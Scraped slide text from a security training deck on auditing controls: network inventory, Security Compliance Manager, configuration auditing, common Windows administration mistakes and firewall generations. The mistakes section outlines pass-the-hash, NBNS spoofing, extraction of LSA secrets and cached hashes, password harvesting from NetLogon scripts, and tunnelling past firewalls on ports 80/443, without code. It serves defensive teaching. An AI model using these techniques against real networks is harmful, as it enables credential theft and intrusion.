Advanced methodologies resolving dimensionality complications for autism neur...
Programs and apps: productivity, graphics, security and other tools
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Reach Out and Touch Someone: Haptics and Empathic Computing
Digital-Transformation-Roadmap-for-Companies.pptx
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
MYSQL Presentation for SQL database connectivity
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
cuic standard and advanced reporting.pdf
Spectral efficient network and resource selection model in 5G networks
20250228 LYD VKU AI Blended-Learning.pptx
Per capita expenditure prediction using model stacking based on satellite ima...
ACSFv1EN-58255 AWS Academy Cloud Security Foundations.pptx

Implementing and auditing security controls part 2

  • 1. 173 | P a g e Main Functionalities:  Real-time, subnet-level tracking of unmanaged, networked devices  Detailed hardware information including slot description, memory configuration and network adaptor configuration  Extended plug-and-play monitor data including secondary monitor information  Detailed asset-tag and serial number information, as well as embedded pointed device, fixed drive and CD-ROM data  Multi-layer information model – the idea is to represent the same equipment and connections in several layers, with technology-specific information included in the dedicated layer providing a consistent view of the network for the operator without an information overflow.  The layers represent both physical and logical information of managed network, including: physical network resources, infrastructure, physical connections, digital transmission layer (SDH/SONET (STM-n, VC-4, VC-12, OC-n), PDH (E1, T1)),
  • 2. 174 | P a g e telephony layer, IP-related layers, GSM/CDMA/UMTS-related layers as well as ATM and FR layers  History tracking - inventory objects (equipment, connections, numbering resources etc.) are stored with full history of changes which enables change tracking; a new history entry is made in three cases: object creation (the first history entry is made); object modification (for each modification a new entry is added); and object removal (the last history entry is made)  Auto-discovery and reconciliation – enables to keep the stored information up-to-date with the changes occurring in the network. The auto-discovery tool enables adding new network elements to the inventory database, removing existing network elements from the inventory database as well as updating the inventory database due to changed cards, ports or interfaces  Network planning – future object planning support (storing future changes in the equipment, switches configuration, connections, etc.); plans are executed or applied by the system logic – object creation / changing actually take place and planned objects become active in the inventory system; enables visualization of the network state in the future  Inventory-Based Billing enables accurate calculations of customer charges for inventory products and services (e.g. equipment, locations, connections, capacity); this module is able to calculate charges for services leased from another operator (vendor) and resold (with profit) to customers, and to generate invoices  Inventory and Console Tools allow user-friendly management of important objects used in the application (creating templates (Logical View, Report Management, Charts), editing symbols and links, searching for objects, encrypting passwords and notifying users of various actions/events)  Wizards and templates provide flexibility but do not allow for inconsistent manipulation of data; new objects are created with an object creation wizard (so called template), which enables defining all attributes and necessary referential object (path details for connections, detailed elements (cards, ports) for equipment etc.); the user can define which attributes of an object should be mandatory / predefined and if they should have a constant value  Process-driven Inventory – by introduction of automated processes, all user tasks related to inventory data are done in the context of a process instance; changing the state of the network (e.g. by provisioning a new service) cannot be done without updating information in the inventory; this assures real-time accuracy of the inventory database  Information theft – A network inventory management system not only keeps track of your hardware but also your software. It also shows you who has access to that software. A regular check of your system's inventory will let you know who has downloaded and used software they may not be authorized to use.  Equipment theft – A network management system will automatically detect every piece of equipment and software connected to your system. And it will also let you know which items are not working properly, which items need to be replaced, and which items have
  • 3. 175 | P a g e mysteriously disappeared. Eliminate workplace theft simply by running a regularly scheduled inventory check.  Licensing agreements – An inventory of your software and licensing agreements will let you know if you've got the necessary licensing agreements for all your software. Insufficient licensing can cost you usage fees and fines and duplicating software that you already have is an unnecessary expense.  System Upgrades – Outdated equipment and software can cost your company time, money, and resources. Downtime and slow response times are two of the biggest time killers for your business. Set filters on your network inventory management system to alert you when it's time to upgrade software or replace hardware with newer technology to keep your system running as smoothly and efficiently as possible. Benefits:  End-to-end view of multi-vendor, multi-technology networks  Reduced network operating cost  Improved utilization of existing resources  Quicker, more efficient change management  Visualization and control of distributed resources  Seamless integration within the existing environment  Automatically discovers and diagrams network topology  Automatic generation of network maps in Microsoft Office Visio  Automatically detects new devices and changes to network topology  Simplifies inventory management for hardware and software assets  Addresses reporting needs for PCI compliance and other regulatory requirements powerful capabilities, including: o Inventory management for all systems o Direct access to Windows, Macintosh and Linux devices o Automatically save hardware and software configuration information in a SQL database o Generate systems continuity and backup profiler reports o Use remote management capabilities to shut down, restart and launch applications
  • 4. 176 | P a g e Completing the gaps with scripts
  • 5. 177 | P a g e Creating Device Groups (Security Level, Same Version…) Creating Policies Microsoft released Security Compliance Manager along with a heap of new security baseline for you to use to compare against your environment. In case you are not familiar with SCM then it is a great product from Microsoft that consolidates all the best practice for their software with in-depth explanation for each setting. Notably this new version has security baselines for Exchange Server 2010 and 2007. These baselines are also customized for the specific role of the server. Also interesting is the baseline settings not only include group policy computer settings but also PowerShell command to configured aspects of the product that are not as simply to make as a registry key change.
  • 6. 178 | P a g e
  • 7. 179 | P a g e As you can see from the image below the PowerShell script to perform the required configuration is listed in the detail pain… Attachments and Guidelines Another new feature you might notice is that there is now a section called Attachments and Guidelines that has a lot of support documentation that relate to the Security baseline. This section also allows you to add your own supporting documentation to your custom baseline templates.
  • 8. 180 | P a g e How to Import an existing GPO into Microsoft Security Compliance Manager v2 To start you simply need to make a backup of the existing Group Policy Object via the Group Policy Management Console and then import it by selecting the “Import GPO” option in the new tool at the top right corner (see image below).
  • 9. 181 | P a g e Select the path to the backup of individual GPO (see image below).
  • 10. 182 | P a g e Once you click OK the policy will then import into the SCM tool. Once the GPO is imported the tool will look at the registry path and if it is a known value it will then match it up with the additional information already contained in the SCM database (very smart).
  • 11. 183 | P a g e Now that you have the GPO imported into the SCM tool you can use the “compare” to see the differences between this and the other baselines. How to compare Baseline setting in the Security Compliance Manager tool Simply select the policy you want to compare on the left hand column and then select the “Compare” option on the right hand side (see image below).
  • 12. 184 | P a g e Now select the Baseline policy you want to do the comparison with and press OK.
  • 13. 185 | P a g e The result is a reporting showing the setting and values that are different between the two policies.
  • 14. 186 | P a g e The values tab will show you all the common settings between the policies that have different values and the other tab will show you all the settings that are uniquely configured in either policy.
  • 15. 187 | P a g e Auditing to verify security in practice How to avoid risk from inconsistent network and security configuration practices? Regulations define specific traffic and firewall policies that must be deployed, monitored, audited, and enforced. Unfortunately, due to the silos organizations often lack the ability to seamlessly assess when a network configuration allows traffic that is "out of policy" per compliance, corporate mandate, or industry best practice. Configuration Audit: Configuration Audit tools provide automated collection, monitoring, and audit of configuration across an organization's switches, routers, firewalls, and IDS/IPS. Through a unique ability to normalize multi-vendor device configuration, provides a detailed and intuitive assessment of how devices are configured, including defined firewall rules, security policy, and network hierarchy. These solutions maintain a history of configuration changes, audit configuration rules on a device, and compare this across devices. Intelligently integrated with network activity data, device configuration data is instrumental in building an enterprise-wide representation of a networks topology. This topology mapping helps an organization to understand allowed and
  • 16. 188 | P a g e denied activity across the entire network, resulting in improved consistency of device configuration and flagged configuration changes that introduce risk to the network. Configuration Auditing Solution Vary To the following types: 1. Configuration Management Software – Usually provides a comparison between two configuration sets and also a comparison a specific compliance template 2. Configuration Analyzers – Mostly common in analyzing Firewall configurations known as “Firewall Analyzer” and “Firewall Configuration Analyzer” 3. Local Security Compliance Scanners – Tools such as “MBSA” Microsoft Baseline Security Analyzer tools provide local system configuration analysis 4. Vulnerability Assessment Products – aka “Security Scanners” Vulnerability scanners can be used to audit the settings and configuration of operating systems, applications, databases and network devices. Unlike vulnerability testing, an audit policy is used to check various values to ensure that they are configured to the correct policy. Example policies for auditing include password complexity, ensuring the logging is enabled and testing that anti- virus software is installed properly. Audit policies of common vulnerability scanners have been certified by the US Government or Center for Internet Security to ensure that the auditing tool accurately tests for best practice and required configuration settings. When combined with vulnerability scanning and real-time monitoring with the auditing tools offer some powerful features such as:  Detecting system change events in real-time and then performing a configuration audit  Ensuring that logging is configured correctly for Windows and Unix hosts  Auditing the configuration of a web application's operating system, application and SQL database Audit policies may also be deployed to search for documents that contain sensitive data such as credit card or Social Security numbers. A basic tenet of most IT management practices is to minimize variance. Even though your organization may consist of certain types of operating systems and hardware, small changes in drivers, software, security policies, patch updates and sometimes even usage can have dramatic effects on the underlying configuration. As time goes by, these servers and desktop computers can have their configuration drift further away from a "known good" standard, which makes maintaining them more difficult. The following are the most common types of auditing provided by security auditing tools:  Application Auditing Configuration settings of applications such as web servers and anti-virus can be tested against a policy.  Content Auditing Office documents and files can be searched for credit card numbers and other sensitive content.  Database Auditing
  • 17. 189 | P a g e SQL database settings as well as setting so the host operating systems can be tested for compliance.  Operating System Auditing Access control, system hardening, error reporting, security settings and more can be tested against many types of industry and government policies.  Router Auditing Authentication, security and configuration settings can be audited against a policy. Agentless vs. Agent-Based Security Auditing Solutions The chart below provides a high level view of agent-based versus agentless systems; details follow. Solution Characteristic Agentless Agent-Based Asset Discovery Advantage None/Limited Asset Coverage Advantage Limited Audit Comprehensiveness Par Par Target System Impact Advantage Variable Target System Security Advantage Variable Network Impact Variable/Low Low Cost of Deployment Advantage High Cost of Ownership Advantage High Scalability Advantage Limited Functionalities: 1. Asset Discovery: the ability to discover and maintain an accurate inventory of IT assets and applications. Agentless solutions typically have broader discovery capabilities – including both active and passive technologies – that permit them to discover a wider range of assets. This includes discovery of assets that may be unknown to administrators or should not be on your network. 2. Asset Coverage: the breadth of IT assets and applications that can be assessed. Many IT assets that need to be audited simply cannot accept agent software. Examples include network devices like routers and switches, point-of-sale systems, IP phones and many firewalls. 3. Audit Comprehensiveness: the degree of completeness with which the auditing system can assess the target system’s security and compliance status. Using credentialed access, agentless solutions can assess any configuration or data item on the target system, including an analysis of system file integrity (file integrity monitoring). 4. Target System Impact: the impact on the stability and performance of the scan target. Agentless solutions use well-defined remote access interfaces to log in and retrieve the desired data, and as a result have a much more benign impact on the stability of the assets being scanned than agent-based systems do.
  • 18. 190 | P a g e 5. Target System Security: the impact of the auditing system on the security of the target system. Agentless auditing solutions are uniquely positioned to conduct objective and trusted security analyses because they do not run on the target system. 6. Network Impact: the impact on the performance of the associated network. Although agentless auditing solutions gather target system configuration information using a network-based remote login, actual network impact is marginal due to bandwidth throttling and overall low usage. 7. Cost of Deployment: the time and effort required to make the auditing system operational. Since there are no agents to install, getting started with agentless solutions is significantly faster than with agent-based solutions – typically hours rather than days or weeks. 8. Cost of Ownership: the time and effort required to update and adjust the configuration of the auditing system. Agentless solutions typically have much lower costs of ownership than agent-based systems; deployment is easier and faster, there are fewer components to update and configuration is centralized on one or two systems. 9. Scalability: the number of target systems that a single instance of the audit system can reliably audit in a typical audit interval. Agentless auditing solutions excel in scalability, as auditing scalability is virtually unlimited simply by increasing the number of management servers. 10. Simplified configuration compliance Simplifies configuration compliance with drag-and-drop templates for Windows and Linux operating systems and applications from FDCC, NIST, STIGS, USGCB and Microsoft. Prioritize and manage risk, audit configurations against internal policy or external best practice and centralize reporting for monitoring and regulatory purposes. 11. Complete configuration assessment Provides a comprehensive view of Windows devices by retrieving software configuration that includes audit settings, security settings, user rights, logging configuration and hardware information including memory, processors, display adapters, storage devices, motherboard details, printers, services, and ports in use. 12. Out-of-the-box configuration auditing Out-of-the-box configuration auditing, reporting, and alerting for common industry guidelines and best practices to keep your network running, available, and accessible. 13. Datasheet configuration auditing Compare assets to industry baselines and best practices to check whether any software or hardware changes were made since the last scan that could impact your security and compliance objectives. 14. Up-to-date baselines With this module, a complete configuration compliance benchmark library keeps systems up-to-date with industry benchmarks including changes to benchmarks and adjustments for newer operating systems and applications. 15. Customized best practices Customized best practices for improved policy enforcement and implementation for a broad set of industry templates and standards including built-in configuration templates for NIST, Microsoft, and more. 16. Built- in templates
  • 19. 191 | P a g e Built-in templates for Windows and Linux operating systems and applications from FDCC, NIST, STIGS, USGCB, and Microsoft. 17. Oval 5.6 SCAP support 18. Streamlined reporting Streamlined reporting for government and corporate standards with built-in vulnerability reporting.
  • 20. 192 | P a g e Case Studies Summary: Top 10 Mistakes - Managing Windows Networks “The shoemaker's son always goes barefoot”  Network Administrators who uses Windows XP or Windows 7 without UAC on their own computer  Network Administrators who have a weak password for a local administrator account on their machine o An Example from a real client: Zorik:12345  Network Administrators that their computer in excluded from security scans  Network Administrators that their computer lacks security patches  Network Administrators that their computer doesn’t have an Anti-Virus  Network Administrators with unencrypted Laptops Domain Administrators on Users VLAN  In most organizations administrators and user are connected to the same VLAN  In this case, a user/attacker can: o Attack the administrators computers using NetBIOS Brute Force o Spoof a NetBIOS name of a local server and attack using an NBNS Race Condition Name Spoofing o Take Over the network traffic using a variety of Layer 2 attacks and:  Replace/Infect EXE files that will execute with network administrator privileges  Steal Passwords & Hashes of Domain Administrators  Execute Man-In-The-Middle attacks on encrypted connections (RDP, SSH, SSL)
  • 21. 193 | P a g e Domain Administrator with a Weak Password
  • 22. 194 | P a g e Domain Administrator without the Conficker Patch (MS08- 067)
  • 23. 195 | P a g e (LM and NTLM v1) vs. (NTLM v.2)  Once the hash of a network administrator is sent over the network, his identity can be stolen by: o The can be used in Pass-The-Hash attack o The hash can be broken via Dictionary, Hybrid, Brute Force, Rainbow Tables attacks
  • 24. 196 | P a g e
  • 25. 197 | P a g e Pass the Hash Attack
  • 26. 198 | P a g e Daily logon as a Domain Administrator 1. Is there an entity among man which answers the definition “God”? (Obviously no…) a. Computers shouldn’t have one either (refers to “Domain Administrator” default privilege level) b. Isn’t a network administrator a normal user when he connects to his machine? c. Doesn’t the network administrator surf the internet? d. Doesn’t he visit Facebook? e. Doesn’t he receive emails and opens them? f. Doesn’t he download and installs applications? g. Can’t the application he downloaded contain a malware/virus? h. What can a virus do running under Domain Administrator privileges? i. What is the potential damage to data, confidentiality and operability in costs? Using Domain Administrator for Services  Why does MSSQL “require” Domain Administrator privileges? (It doesn’t…)  When a password is assigned to a service, the raw data of the password is stored locally and can be extracted by a remote user with local administrative account  The scenario of a service actually requiring Domain Administrator privileges is extremely rare (almost doesn’t exist) and is mostly a wrong analysis/laziness of real requirements by the decision maker
  • 27. 199 | P a g e  In the most common case where a service requires an account which is different from SYSTEM it only requires a local/domain user with only LOCAL administrative privileges  In the cases where a network manager or a service requires “the highest privileges”, they only require local administrator on clients and/or operational servers but not the Domain Administrator privilege. (which has login privileges to manage the domain controllers, DNS servers, backup servers, most of today’s enterprise applications which integrate into active directory) Managing the network with Local Administrator Accounts  In most cases the operational requirement is: o The ability to install software on servers and client endpoint machines o Connecting remotely to machines via C$ (NetBIOS) and Remote Registry o Executing remote network scanning o It is possible to execute 99% percent of the tasks using Separation of Duties, assigning each privilege to a single user/account  Users_Administrator_Group – Local Administrators  Servers_Administrators_Group – Local Administrators  Change Password Privilege The NetLogon Folder  Improper use of the Netlogon folder is the classic way to get Domain Administrator privileges for a long term  The most common cases are: o Administrative Logon scripts with clear text passwords to domain administrator accounts or local administrator account on all machines o Free write/modify permission into the directory  A logical problem, completely un-noticed, almost undetectable  The longer the organization’s IT systems exist, the more “treasures” to discover
  • 28. 200 | P a g e The NetLogon Folder - test.kix – Revealing the Citrix UI Password The NetLogon Folder - addgroup.cmd – Revealing the local Administrator of THE ENTIRE NETWORK
  • 29. 201 | P a g e The NetLogon Folder - password.txt – can’t get any better for a hacker LSA Secrets & Protected Storage  The windows operating system implements an API to work securely with passwords  Encryption keys are stored on the system and the encrypted data is stored in its registry o Internet Explorer o NetBIOS Saved Passwords o Windows Service Manager
  • 30. 202 | P a g e LSA Secrets
  • 31. 203 | P a g e
  • 32. 204 | P a g e Protected Storage
  • 33. 205 | P a g e Wireless Passwords Cached Logons  A user at his home, unplugged from the organizational internal network, trying to log into to his laptop cannot log into the domain  Therefore, the network logon is simulated: o The hash of the user’s password is saved on his machine o When the user inputs his password, it is converted into a hash and compared to the list of saved hashes, if a match is found, the system logs the user in  The vulnerability: the default setting in windows is saving hashes of all the last 10 unique/different passwords used to connect to this machine locally  In most cases, the hash of a domain administrator privileged account is on that list
  • 34. 206 | P a g e  Most organizations don’t distinguish between PCs, Servers and Laptops when it comes to the settings for this feature  Most organizations don’t harden: o The local PCs cached logons amount to 0 o The Laptops cached logons amount to 1 o The Servers to 0 (unless its mission critical, then 1 to 3 are recommended)  It means that at least 50% of the machines contains a domain administrator’s hash and can take over the entire network  Conclusion: A user/attacker with local administrator privileges can get a domain administrator account from most of the organization’s computers Password History  In order to avoid users recycling their passwords o every forced password change, the system the system saves the hash passwords locally  By default, their last 24 passwords are saved on the machine  An attacker with local administrator privileges on the machine, gets all the “password patterns” of all the user accounts who ever logged into this machine  A computer who was used only by 2 people, will contains up to 48 different passwords  Some of these passwords are usually used for other accounts in the organization Users as Local Administrators  When a user is logged on with local administrator privileges, the local system’s entire integrity is at risk  He can install privileged software and drivers such as promiscuous network drivers for advanced network and Man-In-The-Middle attacks and Rootkits  He is able to extract the hashes of all the old passwords of the users who ever logged to the current machine  He is able to extract the hashed of all the CURRENT passwords of the users who ever logged to the current machine
  • 35. 207 | P a g e Forgetting to Harden: RestrictAnonymous=1 Weak Passwords / No Complexity Enforcement  Weak Passwords = A successful Brute Force  Complexity Compliant Passwords -> which appear in a passwords dictionary “Password1!”  Old passwords or default passwords of the organization Guess what the password was? (gma )
  • 36. 208 | P a g e Firewalls Understanding Firewalls (1, 2, 3, 4, 5 generations) A firewall is a device or set of devices designed to permit or deny network transmissions based upon a set of rules and is frequently used to protect networks from unauthorized access while permitting legitimate communications to pass. Many personal computer operating systems include software-based firewalls to protect against threats from the public Internet. Many routers that pass data between networks contain firewall components and, conversely, many firewalls can perform basic routing functions. First generation: packet filters The first paper published on firewall technology was in 1988, when engineers from Digital Equipment Corporation (DEC) developed filter systems known as packet filter firewalls. This fairly basic system was the first generation of what became a highly involved and technical internet security feature. At AT&T Bell Labs, Bill Cheswick and Steve Bellovin were continuing their research in packet filtering and developed a working model for their own company based on their original first generation architecture. Packet filters act by inspecting the "packets" which transfer between computers on the Internet. If a packet matches the packet filter's set of rules, the packet filter will drop (silently discard) the packet, or reject it (discard it, and send "error responses" to the source). This type of packet filtering pays no attention to whether a packet is part of an existing stream of traffic (i.e. it stores no information on connection "state"). Instead, it filters each packet based only on information contained in the packet itself (most commonly using a combination of the packet's source and destination address, its protocol, and, for TCP and UDP traffic, the port number). TCP and UDP protocols constitute most communication over the Internet, and because TCP and UDP traffic by convention uses well known ports for particular types of traffic, a "stateless" packet filter can distinguish between, and thus control, those types of traffic (such as web browsing, remote printing, email transmission, file transfer), unless the machines on each side of the packet filter are both using the same non-standard ports. Packet filtering firewalls work mainly on the first three layers of the OSI reference model, which means most of the work is done between the network and physical layers, with a little bit of peeking into the transport layer to figure out source and destination port numbers.[8] When a packet originates from the sender and filters through a firewall, the device checks for matches to any of the packet filtering rules that are configured in the firewall and drops or rejects the packet accordingly. When the packet passes through the firewall, it filters the packet on a protocol/port number basis (GSS). For example, if a rule in the firewall exists to block telnet access, then the firewall will block the TCP protocol for port number 23.
  • 37. 209 | P a g e Second generation: "stateful" filters From 1989-1990 three colleagues from AT&T Bell Laboratories, Dave Presetto, Janardan Sharma, and Kshitij Nigam, developed the second generation of firewalls, calling them circuit level firewalls. Second-generation firewalls perform the work of their first-generation predecessors but operate up to layer 4 (transport layer) of the OSI model. They examine each data packet as well as its position within the data stream. Known as stateful packet inspection, it records all connections passing through it determines whether a packet is the start of a new connection, a part of an existing connection, or not part of any connection. Though static rules are still used, these rules can now contain connection state as one of their test criteria. Certain denial-of-service attacks bombard the firewall with thousands of fake connection packets to in an attempt to overwhelm it by filling up its connection state memory. Third generation: application layer The key benefit of application layer filtering is that it can "understand" certain applications and protocols (such as File Transfer Protocol, DNS, or web browsing), and it can detect if an unwanted protocol is sneaking through on a non-standard port or if a protocol is being abused in any harmful way. The existing deep packet inspection functionality of modern firewalls can be shared by Intrusion- prevention Systems (IPS). Currently, the Middlebox Communication Working Group of the Internet Engineering Task Force (IETF) is working on standardizing protocols for managing firewalls and other middleboxes. Another axis of development is about integrating identity of users into Firewall rules. Many firewalls provide such features by binding user identities to IP or MAC addresses, which is very approximate and can be easily turned around. The NuFW firewall provides real identity-based firewalling, by requesting the user's signature for each connection. Authpf on BSD systems loads firewall rules dynamically per user, after authentication via SSH. Application firewall An application firewall is a form of firewall which controls input, output, and/or access from, to, or by an application or service. It operates by monitoring and potentially blocking the input, output, or system service calls which do not meet the configured policy of the firewall. The application firewall is typically built to control all network traffic on any OSI layer up to the application layer. It is able to control applications or services specifically, unlike a stateful network firewall which is - without additional software - unable to control network traffic regarding a specific application. There are two primary categories of application firewalls, network-based application firewalls and host-based application firewalls.
  • 38. 210 | P a g e Network-based application firewalls A network-based application layer firewall is a computer networking firewall operating at the application layer of a protocol stack, and are also known as a proxy-based or reverse-proxy firewall. Application firewalls specific to a particular kind of network traffic may be titled with the service name, such as a web application firewall. They may be implemented through software running on a host or a stand-alone piece of network hardware. Often, it is a host using various forms of proxy servers to proxy traffic before passing it on to the client or server. Because it acts on the application layer, it may inspect the contents of the traffic, blocking specified content, such as certain websites, viruses, and attempts to exploit known logical flaws in client software. Modern application firewalls may also offload encryption from servers, block application input/output from detected intrusions or malformed communication, manage or consolidate authentication, or block content which violates policies. Host-based application firewalls A host-based application firewall can monitor any application input, output, and/or system service calls made from, to, or by an application. This is done by examining information passed through system calls instead of or in addition to a network stack. A host-based application firewall can only provide protection to the applications running on the same host. Application firewalls function by determining whether a process should accept any given connection. Application firewalls accomplish their function by hooking into socket calls to filter the connections between the application layer and the lower layers of the OSI model. Application firewalls that hook into socket calls are also referred to as socket filters. Application firewalls work much like a packet filter but application filters apply filtering rules (allow/block) on a per process basis instead of filtering connections on a per port basis. Generally, prompts are used to define rules for processes that have not yet received a connection. It is rare to find application firewalls not combined or used in conjunction with a packet filter. Also, application firewalls further filter connections by examining the process ID of data packets against a ruleset for the local process involved in the data transmission. The extent of the filtering that occurs is defined by the provided ruleset. Given the variety of software that exists, application firewalls only have more complex rule sets for the standard services, such as sharing services. These per process rule sets have limited efficacy in filtering every possible association that may occur with other processes. Also, these per process ruleset cannot defend against modification of the process via exploitation, such as memory corruption exploits. Because of these limitations, application firewalls are beginning to be supplanted by a new generation of application firewalls that rely on mandatory access control (MAC), also referred to as sandboxing, to protect vulnerable services. Examples of next generation host-based application firewalls which control system service calls by an application are AppArmor and the TrustedBSD MAC framework (sandboxing) in Mac OS X. Host-based application firewalls may also provide network-based application firewalling.
  • 39. 211 | P a g e Distributed web application firewalls Distributed Web Application Firewall (also called a dWAF) is a member of the web application firewall (WAF) and Web applications security family of technologies. Purely software-based, the dWAF architecture is designed as separate components able to physically exist in different areas of the network. This advance in architecture allows the resource consumption of the dWAF to be spread across a network rather than depend on one appliance, while allowing complete freedom to scale as needed. In particular, it allows the addition / subtraction of any number of components independently of each other for better resource management. This approach is ideal for large and distributed virtualized infrastructures such as private, public or hybrid cloud models. Cloud-based web application firewalls Cloud-based Web Application Firewall is also member of the web application firewall (WAF) and Web applications security family of technologies. This technology is unique due to the fact that it is platform agnostic and does not require any hardware or software changes on the host, just a DNS change. By applying this DNS change, all web traffic is routed through the WAF where it is inspected and threats are thwarted. Cloud-based WAFs are typically centrally orchestrated, which means that threat detection information is shared among all the tenants of the service. This collaboration results in improved detection rates and lower false positives. Like other cloud-based solutions, this technology is elastic, scalable and is typically offered as a pay- as-you grows service. This approach is ideal for cloud-based web applications and small or medium sized websites that require web application security but are not willing or able to make software or hardware changes to their systems.  In 2010, Imperva spun out Incapsula to provide a cloud-based WAF for small to medium sized businesses.  Since 2011, United Security Providers provides the Secure Entry Server as an Amazon EC2 Cloud-based Web Application Firewall  Akamai Technologies offers a cloud-based WAF that incorporates advanced features such as rate control and custom rules enabling it to address both layer 7 and DDoS attacks. The Common Firewall’s Limits 1. The common firewall works on ACL rules where something is allowed or denied based on a simple set of parameters such as Source IP, Destination IP, Source Port and Destination Port. 2. Most firewalls don’t support application level rules that would allow the creation of smart rules that match today’s more active application-rich technology world. 3. Every hacker knows that 99.9% from the firewalls on planet earth are configured to allow connections to remote machines at TCP port 80, since this is the port of the “WEB”, used by HTTP. 4. Today’s firewalls will allow any kind of traffic to leave the organization on port 80, this means that:
  • 40. 212 | P a g e  Hackers can use “network tunneling” technology to transfer ANY kind of information on port 80 and therefore bypass all of the currently deployed firewalls  In terms of traffic and content going through a port defined to be open, such as port 80, Firewalls are configured to act as a blacklist, therefore tunneling an ENCRYPTED connection such as SSL and SSH on port 80, will bypass all of the firewall’s potential inspection features.  The problem gets worse when ports that allow encryption connections are commonly available, such as port 443, which supports the encrypted HTTPS protocol. Hackers can tunnel any communication on port 443 and encrypt it with HTTPS to imitate the behavior of any standard browser.  The firewalls which do inspect SSL traffic relay on the assumption that they will generate and sign a certificate on their own for the browsed domain and the browser will accept it since they are defined on the machine as a trusted Certificate Authority. However, as firewalls work mostly on blacklist mode, they will still forward any traffic that they fail to open and inspect. Implementing Application Aware Firewalls Features Palo Alto Networks has built a next-generation firewall with several innovative technologies enabling organizations to fix the firewall. These technologies bring business-relevant elements (applications, users, and content) under policy control on high performance firewall architecture. This technology runs on a high-performance, purpose-built platform based on Palo Alto Networks' Single-Pass Parallel Processing (SP3) Architecture. Unique to the SP3 Architecture, traffic is only examined once, using hardware with dedicated processing resources for security, networking, content scanning and management to provide line-rate, low-latency performance under load. Application Traffic Classification Accurate traffic classification is the heart of any firewall, with the result becoming the basis of the security policy. Traditional firewalls classify traffic by port and protocol, which, at one point, was a satisfactory mechanism for securing the perimeter. Today, applications can easily bypass a port-based firewall; hopping ports, using SSL and SSH, sneaking across port 80, or using non-standard ports. App-IDTM, a patent-pending traffic classification mechanism that is unique to Palo Alto Networks, addresses the traffic classification limitations that plague traditional firewalls by applying multiple classification mechanisms to the
  • 41. 213 | P a g e traffic stream, as soon as the device sees it, to determine the exact identity of applications traversing the network. Classify traffic based on applications, not ports. App-ID uses multiple identification mechanisms to determine the exact identity of applications traversing the network. The identification mechanisms are applied in the following manner:  Traffic is first classified based on the IP address and port.  Signatures are then applied to the allowed traffic to identify the application based on unique application properties and related transaction characteristics.  If App-ID determines that encryption (SSL or SSH) is in use and a decryption policy is in place, the application is decrypted and application signatures are applied again on the decrypted flow.  Decoders for known protocols are then used to apply additional context-based signatures to detect other applications that may be tunneling inside of the protocol (e.g., Yahoo! Instant Messenger used across HTTP).  For applications that are particularly evasive and cannot be identified through advanced signature and protocol analysis, heuristics or behavioral analysis may be used to determine the identity of the application. As the applications are identified by the successive mechanisms, the policy check determines how to treat the applications and associated functions: block them, or allow them and scan for threats, inspect for unauthorized file transfer and data patterns, or shape using QoS.
  • 42. 214 | P a g e Always on, always the first action taken across all ports. Classifying traffic with App-ID is always the first action taken when traffic hits the firewall, which means that all App-IDs are always enabled, by default. There is no need to enable a series of signatures to look for an application that is thought to be on the network; App-ID is always classifying all of the traffic, across all ports - not just a subset of the traffic (e.g., HTTP). All App-IDs are looking at all of the traffic passing through the device; business applications, consumer applications, network protocols, and everything in between. App-ID continually monitors the state of the application to determine if the application changes midstream, providing the updated information to the administrator in ACC, applies the appropriate policy and logs the information accordingly. Like all firewalls, Palo Alto Networks next-generation firewalls use positive control, default denies all traffic, then allow only those applications that are within the policy. All else is blocked. All classification mechanisms, all application versions, all OSes. App-ID operates at the services layer, monitoring how the application interacts between the client and the server. This means that App-ID is indifferent to new features, and it is client or server operating system agnostic. The result is that a single App-ID for Bit Torrent is going to be roughly equal to the many Bit Torrent OS and client signatures that need to be enabled to try and control this application in other offerings. Full visibility and control of custom and internal applications. Internally developed or custom applications can be managed using either an application override or custom App-IDs. An applications override effectively renames the traffic stream to that of the internal application. The other mechanism would be to use the customizable App-IDs based on context-based signatures for HTTP, HTTPs, FTP, IMAP, SMTP, RTSP, Telnet, and unknown TCP /UDP traffic. Organizations can use either of these mechanisms to exert the same level of control over their internal or custom applications that may be applied to SharePoint, Salesforce.com, or Facebook. Securely Enabling Applications Based on Users & Groups Traditionally, security policies were applied based on IP addresses, but the increasingly dynamic nature of users and applications means that IP addresses alone have become ineffective as a mechanism for monitoring and controlling user activity. Palo Alto Networks next-generation firewalls integrate with a wide range of user repositories and terminal service offerings, enabling organizations to incorporate user and group information into their security policies. Through User-ID, organizations also get full visibility into user activity on the network as well as user-based policy-control, log viewing and reporting.
  • 43. 215 | P a g e Transparent use of users and groups for secure application enablement. User-ID seamlessly integrates Palo Alto Networks next-generation firewalls with the widest range of enterprise directories on the market; Active Directory, eDirectory, OpenLDAP and most other LDAP based directory servers. The User-ID agent communicates with the domain controllers, forwarding the relevant user information to the firewall, making the policy tie-in completely transparent to the end- user. Identifying users via a browser challenge. In cases where a user cannot be automatically identified through a user repository, a captive portal can be used to identify users and enforce user based security policy. In order to make the authentication process completely transparent to the user, Captive Portal can be configured to send a NTLM authentication request to the web browser instead of an explicit username and password prompt. Integrate user information from other user repositories. In cases where organizations have a user repository or application that already has knowledge of users and their current IP addresses, an XML-based REST API can be used to tie the repository to the Palo Alto Networks next-generation firewall.
  • 44. 216 | P a g e Transparently extend user-based policies to non-Windows devices. User-ID can be configured to constantly monitor for logon events produced by Mac OS X, Apple iOS, Linux/UNIX clients accessing their Microsoft Exchange email. By expanding the User-ID support to non-Windows platforms, organizations can deploy consistent application enablement policies. Visibility and control over terminal services users. In addition to support for a wide range of directory services, User-ID provides visibility and policy control over users whose identity is obfuscated by a Terminal Services deployment (Citrix or Microsoft). Completely transparent to the user, every session is correlated to the appropriate user, which allows the firewall to associate network connections with users and groups sharing one host on the network. Once the applications and users are identified, full visibility and control within ACC, policy editing, logging and reporting is available. High Performance Threat Prevention Content-ID combines a real-time threat prevention engine with a comprehensive URL database and elements of application identification to limit unauthorized data and file transfers, detect and block a wide range of threats and control non-work related web surfing. The application visibility and control delivered by App-ID, combined with the content inspection enabled by Content-ID means that IT departments can regain control over application traffic and the related content.
